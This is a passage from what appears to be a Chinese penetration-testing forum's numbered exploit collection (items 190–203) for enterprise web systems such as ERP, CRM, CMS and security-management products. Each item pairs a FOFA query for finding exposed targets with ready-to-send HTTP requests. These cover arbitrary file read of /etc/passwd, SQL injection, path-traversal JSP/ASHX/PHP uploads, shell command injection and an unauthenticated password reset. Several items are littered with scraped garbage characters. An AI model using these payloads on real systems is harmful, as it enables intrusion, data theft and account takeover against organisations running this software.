Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The endpoint is a delete operation on a medical study, so test it only with a documentUniqueId that does not exist.

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

The poi parameter is handed to a URL fetcher, which is why the file:// scheme reads a local file; the same sink would also reach internal HTTP services.

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

The /js/../ segment is a path-normalization trick: a filter that whitelists static /js/ resources lets the request through, while the container resolves it to /CDGServer3/NavigationAjax. The id value is a stacked MSSQL time-based payload.

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

The name query parameter controls the stored file name, so the .ashx extension turns the raw request body into an ASP.NET handler; the body above is a minimal handler that writes "test" when requested.

+ v5 c2 ]: z  W" _% U* o193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
' Y  w, b7 w7 V; b* ^3 AFOFA:body="山石云鉴主机安全管理系统"4 [" @% h# p6 @1 B9 }
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
  K& s1 R; I* r4 S: L. }6 k: w: W+ jHost:
$ c* N; t7 u3 a# ^Cookie: PHPSESSID=2333333333333;1 Z  z" m7 ^/ i5 B& [
Content-Type: application/x-www-form-urlencoded  ?( a! ?  v7 E$ D& V. ^# Z
User-Agent: Mozilla/5.0
  d3 j" e2 [3 n* `9 @1 A8 q5 |$ `$ B9 v( H) D$ {' C  a
$ Z/ W! D) M5 X# X
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1) f) {! v9 p4 G6 d
Host:! |0 F: ~' K3 p2 E8 d
User-Agent: Mozilla/5.08 P) \+ [1 u$ {/ a/ o5 u! g7 u# I
Accept-Encoding: gzip, deflate; m1 f; p9 W+ _+ U! m! c' l
Accept: */*: s1 Z7 |/ B5 S( Q2 M; t
Connection: close( M6 p  }; a' {: q( }
Cookie: PHPSESSID=2333333333333;5 u- U7 s. @9 ?& m  f! W
Content-Type: application/x-www-form-urlencoded& A9 i  n5 T4 Z$ V
Content-Length: 84
7 U) b) T' `9 r# c( p# ?- u& u# I0 J6 \
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')7 [* c8 Y  H2 _; H

( A8 S/ F1 @3 k9 R( b6 }
! R! D; [0 i; @1 m" G* w3 X  P( c+ eGET /master/img/config HTTP/1.1
3 B" R" R. \( CHost:
4 b: {3 R- @" l4 ~3 V- \1 v; c/ wUser-Agent: Mozilla/5.0
. B# L4 b; D8 D# z8 I$ }2 Y/ y8 ^" V8 I( c
1 w& C& ?! K6 L/ B$ P
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
Quick check: if a request to /servlet/uploadAttachmentServlet returns a response (rather than 404), the vulnerable servlet is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The filename is not sanitized, so the ../ sequence walks out of the attachment directory and drops the JSP into the deployed fe.war, where the container executes it.

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

The name field is concatenated into a shell command: the leading ; terminates the intended command, uname -a runs, and the trailing echo keeps the rest of the line syntactically valid. The body is JSON even though the PoC sends it with a form Content-Type.

. ?; u/ k: Q7 L, [# u, h196. 河南省风速科技统一认证平台密码重置
1 z% [/ q' N/ TFOFA:body="/cas/themes/zbvc/js/jquery.min.js"/ p$ d  w5 N* j. p5 {7 ]8 `4 V. z
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
7 V' F3 q# s5 [- [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" s! U9 q8 }' z% I
Content-Type: application/json;charset=UTF-89 C; D! `0 Z! s1 N
X-Requested-With: XMLHttpRequest
# P5 ]2 z5 k  _; R6 {Host:1 A% J' n, l/ J: N
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
! c* l% T0 i+ A: {Content-Length: 45
8 T2 f0 v, Y/ a, `' N7 t: TConnection: close; D3 j6 [6 U! x) M* b& C7 _# o: g
" Z8 t" g% g0 c8 \2 A# F4 f1 I
{"xgh":"test","newPass":"test666","email":""}: w- H: [! R8 ~+ ^5 q( @# Y

7 s2 H! _& Z/ c! w5 z7 z2 r- C. X1 `( J# b- A

# _# T# Q  b4 f0 T197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
; |& j" V0 o- T: F1 TFOFA:app="浙大恩特客户资源管理系统"
) z" h# T5 F' `) |! fGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.10 L, y& r! h# `2 P2 {
Host:
0 U$ {8 Q# p( ?% r9 b1 }, z9 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36$ J1 w# w, V4 v
Accept-Encoding: gzip, deflate9 I; M: z+ I! D  g* |+ ?1 |+ ?, C) s% S
Connection: close* ^  h( c* |. Y
5 K- i# s' `6 r8 \0 S6 ]
* e2 f' T& X) G; j4 n% w' `

+ T# r5 P9 V+ {3 W# h, r9 V198.  阿里云盘 WebDAV 命令注入
- P# Z+ |! v2 `( T( rCVE-2024-29640
2 f: ?- L" J2 u, q* G. Z- JGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1; S; l# r7 P- `' Y, x" p" t
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf643 M% d, T. S/ z/ U( r9 u7 t
Accept: */*
. _6 W* U, C& a: ]5 c4 |Accept-Encoding: gzip, deflate
7 P! H& Y* J9 \2 |3 D8 o; jAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6  H4 q( k2 T( g1 b) @- ^
Connection: close; h$ [1 h/ a, }& y7 Z

, G5 h8 R8 E! C8 D: |/ d$ e: f6 |* t+ L5 @
199. Cockpit CMS assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
1. Fetch the login page to obtain the CSRF token (the application spells the field "csfr"):
GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response: 200, containing csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with that token (the PoC uses the credentials admin/admin) to obtain a session cookie:
POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file through the assets manager with that session, then request it:
POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The file is then reachable at /storage/uploads/tttt.php; the payload prints "tttt" and deletes itself on first request.

1 ?8 K  ^$ G# p200. SeaCMS海洋影视管理系统dmku SQL注入8 |1 T& p5 Q6 C0 L  E
FOFA:app="海洋CMS"
* Q4 s6 R+ Y3 j' l8 J2 i1 j5 qGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1) n7 H+ J3 {6 b6 J2 O7 k; f# _
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s8 ]( A4 K: _2 V+ v! H
Upgrade-Insecure-Requests: 1. z  j! T& _- f$ V+ o6 ?: n! m
Cache-Control: max-age=0
4 _3 t5 U- b0 [$ Y# B- c% a( u  RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# Q+ t( u9 M1 [  X( T0 b  R
Accept-Encoding: gzip, deflate# ]: E. ^/ [! g$ J1 Z+ n
Accept-Language: zh-CN,zh;q=0.9
+ n. K! L8 V) f$ Y
% y9 T# a) T! y& Q) z3 [: Y- p/ B7 T! ]1 m/ v# J
201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

TableName is concatenated straight into the query; decoded it reads DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5'; select DOM_IMAGE from IMG_LARGE_PATH, i.e. a stacked MSSQL query, and a five-second delay confirms it.

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
1. Fetch the page to obtain the current __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

2. Substitute those values for the __VIEWSTATE and __EVENTVALIDATION placeholders below and post the form:
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at /_data/Uploads/1123.txt. The PoC as given only shows that a non-image file name is stored under the web root; whether script extensions are accepted as well is not shown here.

4 Z  \  L9 |* d8 e8 n. O203. 红海云EHR PtFjk 文件上传4 d5 {' W0 n% A: O# ?
FOFA:body="RedseaPlatform"
5 Q3 b: c. C/ qPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" f5 `3 r4 a1 Z/ e! ?
Host: x.x.x.x
& T$ \; H$ J. `% KAccept-Encoding: gzip; S& W8 K! k! v8 P! r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 O* j$ G, @" h8 tContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
7 i) s. L0 v; Q. f, h* P# ~/ _- e! tContent-Length: 210& O/ i% U! d( N/ q
2 _/ t& O  N$ w# M; b" @4 Q
------WebKitFormBoundaryt7WbDl1tXogoZys4
" I9 {7 j# y/ @) d2 f" O8 eContent-Disposition: form-data; name="fj_file"; filename="11.jsp"% r+ P# T! E- k) w# y: c# k
Content-Type:image/jpeg4 j8 J" P7 F/ z7 x, e( x! @8 N

7 t4 t; l7 m( \3 s3 b4 C% s<% out.print("hello,eHR");%>
: q! \; p; g( o  j------WebKitFormBoundaryt7WbDl1tXogoZys4--- K( ~; Q* ~0 v0 l9 _2 S0 D* N4 p

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2